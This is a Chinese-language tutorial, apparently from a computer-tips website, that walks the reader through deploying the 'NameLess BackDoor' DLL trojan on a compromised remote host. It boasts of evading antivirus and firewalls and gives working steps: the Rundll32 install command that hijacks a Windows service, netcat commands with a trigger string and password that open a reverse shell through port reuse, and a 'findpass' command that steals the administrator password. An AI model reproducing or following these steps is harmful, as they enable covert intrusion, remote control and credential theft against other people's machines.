萬盛學電腦網

 萬盛學電腦網 >> 病毒防治 >> 氣瘋安全工具—新興DLL型木馬復仇記

氣瘋安全工具—新興DLL型木馬復仇記

  NameLess BackDoor是一款新興的DLL型木馬,這個木馬出世沒多久,但絕對是一匹極有潛質的千裡駒。

  說起NameLess BackDoor的前身來,不得不提及榕哥的BITS和WinEggDrop的PortLess。這兩款大名鼎鼎的木馬曾經都風光一時,可以說是木馬界的元老了。而NameLess BackDoor則是匯集了上面這兩款木馬的優點,在目標機器的進程管理器中看不到,平時沒有端口,提供正向連接和反向連接兩種功能。同時NameLess BackDoor又去除了各處的缺點,比如反彈的cmd.exe進程,在目標機器的進程管理中也可以隱藏無需利用BITS服務等(馬兒:不開端口,無進程,看看防火牆和殺毒軟件還能拿我怎麼辦!氣死你,哈哈)。

  NameLess BackDoor實戰演練

  將NameLess BackDoor安裝上遠程主機到連接木馬控制主機,就像一場進行在殺毒軟件和防火牆眼皮底下,卻又無聲無悄的暗戰。

  一、隨風潛入夜——安裝

  下載NameLess BackDoor木馬,壓縮包中有兩個名為NameLess.dll的DLL文件,一個Pack壓縮加過殼的,一個是Unpack未壓縮加殼的。先在本地用各種殺毒軟件掃描一下這兩個文件(筆者用的是最新病毒庫的KV2005),但是一向以殺毒能力著稱的KV2005竟然對這兩個木馬文件視而不見。呵,這下子可以放心的在任何環境下進行安裝了。

  怎麼將木馬安裝到遠程的電腦上呢?當然最簡單的就是掃描要攻擊電腦上的系統漏洞,然後進行攻擊入侵控制。方法很多了,反正你拿到遠程主機的控制權後,將上面的任意一個“NameLess.dll”文件上傳到遠程主機上的。在這裡筆者是使用Ttelnet遠程連接後,寫入一個FTP下載的BAT文件,直接在本地建立了一個FTP服務器,通過FTP服務器下載上傳文件的(這些內容以前雜志介紹過,這裡就不作過多的講解啦)。下面重點來看看我是怎樣安裝木馬文件的吧!

  在遠程Ttelnet命令窗口中切換到文件上傳目錄中,並輸入如下命令(如圖1):

  Rundll32 NameLess.dll,Install

  執行該命令後後門就被安裝成功了,後門會自動替換系統服務Sens的ServiceDll文件,在電腦重啟後以Svchost.exe啟動。

  小提示:由於NameLess BackDoor是一個DLL型木馬,因此在安裝和啟動的過程中,遠程主機上的殺毒軟件不會有任何提示和反應。

  二、穿牆細無聲——連接

  安裝和啟動的過程中順利地搞定了殺毒軟件,下面看看NameLess BackDoor怎麼讓防火牆無能為力的。

  小提示:NameLess BackDoor有兩種連接方式:正向連接和反向連接,其中反向方式連接可以讓防火牆不會發出任何提示。同時NameLess BackDoor在連接後門時使用了端口復用技術,通過重用系統進程開放的任意一個端口,因此可以輕松的穿透各種防火牆。

  我們首先需要掃描遠程主機上開放了哪些端口,假設某台遠程主機(IP地址為:192.168.1.11)上開放了139端口,那麼可以本地打開一個命令窗口,切換到瑞士軍刀NC所在的目錄中,運行如下命令:

  nc
  -l -p 12345

  命令執行後將在本地監聽12345端口,然後再打開一個命令窗口,輸入如下命令(如圖2):

  nc 192.168.1.11 139

  建立連接後輸入如下內容(如圖3):

  dargun|192.168.1.11:12345

  其中的IP地址可根據具體情況進行更改。命令執行後,在剛才的監聽窗口中就可以看到出現了連接提示:“Enter Password:”,輸入密碼158352692後就可以成功的登陸遠程主機而不被防火牆發現了!(如果我是防火牆,一定氣瘋了,哈)

  三、為我所欲為——控制

  成功“氣死”殺毒軟件和“逼瘋”防火牆後,現在就可以控制遠程主機了。NameLess

  BackDoor的強大也體現在它的控制功能上,連接登陸遠程主機後,輸入help命令,即可看到詳細的命令幫助信息(如圖4)。如果你使用過winshell或wineggdropshell的話,應該對這種模式的後門就不會陌生,不過就算從來沒有使用過這樣的後門,也會感覺很簡單的。

  1.巧盜管理員密碼

  連接上遠程主機後該干什麼呢?我得好好想一想……呵呵,看看管理員的密碼是多少吧!

  在命令窗口中直接輸入“findpass”命令,很快就可以看到管理員的密碼了(如圖5),真是夠簡單的!

copyright © 萬盛學電腦網 all rights reserved